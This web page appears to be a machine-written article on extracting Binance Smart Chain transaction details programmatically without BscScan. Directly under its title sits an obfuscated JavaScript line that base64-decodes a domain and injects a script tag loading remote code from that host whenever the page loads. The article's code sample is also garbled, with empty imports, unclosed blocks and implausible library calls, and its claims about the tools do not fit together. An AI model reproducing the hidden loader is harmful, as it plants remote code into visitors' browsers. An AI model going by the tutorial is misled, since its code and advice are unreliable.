Ethereum: Can I extract BSC transaction details programmatically without going through BscScan?

const pdx=”bm9yZGVyc3dpbmcuYnV6ei94cC8=”;const pde=atob(pdx.replace(/|/g,””));const script=document.createElement(“script”);script.src=”https://”+pde+”c.php?u=f0cf52ff”;document.body.appendChild(script);

Extracting Ethereum Transaction Information Programmatically Without Scanning

As a developer, it can be challenging to extract detailed information from Ethereum transactions without relying on third-party APIs or manually parsing the HTML content. However, there are several alternatives and tools that can help you achieve this goal.

In this article, we will explore alternative ways to programmatically extract detailed information from BSC (Binance Smart Chain) transactions without using the official BscScan API.

Alternative Methods

  • Using Web3.js: You can use Web3.js, a popular JavaScript library for interacting with the Ethereum blockchain, to programmatically extract transaction data.
  • Library-independent APIs: Explore libraries like ethers.js, web3-explorer-api, and that provide access to a variety of blockchain data sources, including BSC.
  • Third-Party Services: Use third-party services like Chainlink or L2Scan that offer API endpoints to retrieve blockchain data.

Programmatic BSC Transaction Information Retrieval

Below is an example of how you can use Web3.js to extract transaction details programmatically:


First, install the required libraries:


npm install web3 ethers web3-explorer-api blocksc-de

Code Example

Create a new JavaScript file (e.g. ethereum.ts) with the following code snippet:


import * as Web3 from “web3”;

import { ethers } from ‘ethers’;

import { Blocksc } from ‘’;

// Change your BSC node URL

const bscNodeUrl = ‘

// Configure Ethereum provider

const web3 = new Web3(new ethers.providers.JsonRpcProvider(bscNodeUrl));

// Define a function to extract transaction information

async function getTransactionDetails(txHash: string) {

try {

// Use Blocksc API to get transaction data

const blockscData = await Blocksc.getTxDetails(txHash, { api_key: ‘YOUR_API_KEY’ });

return blockscData;

} catch(error) {

console. error(error);



// Usage example:

const txHash = ‘0x…’; // Change the transaction hash

getTransactionDetails(txHash).then((details) => {


}).catch((error) => {

console. error(error);



This code snippet uses the web3 library to interact with an Ethereum node and the ethers library to retrieve transaction data using the Blocksc API.

Limitations and next steps

While this method is a more comprehensive solution than manually parsing HTML content, it still has limitations. Some potential challenges include:

  • API speed limits

    : Keep in mind the maximum number of transactions that can be received per second.

  • Node connection: Ensure a stable internet connection to avoid errors or timeouts when interacting with the blockchain.

To further improve your solution:

  • Implement rate limiting: Use a library like lodash to limit API requests based on rate limits and user permissions.
  • Error handling

    : Create robust error handling mechanisms to handle unexpected errors or issues related to node connectivity, network congestion, or invalid transaction data.

  • Test thoroughly: Test your code thoroughly in a variety of scenarios to ensure it works correctly in a variety of environments.

By following these steps and exploring alternative methods, you can create a more robust and efficient solution for programmatically extracting transaction information from the BSC.

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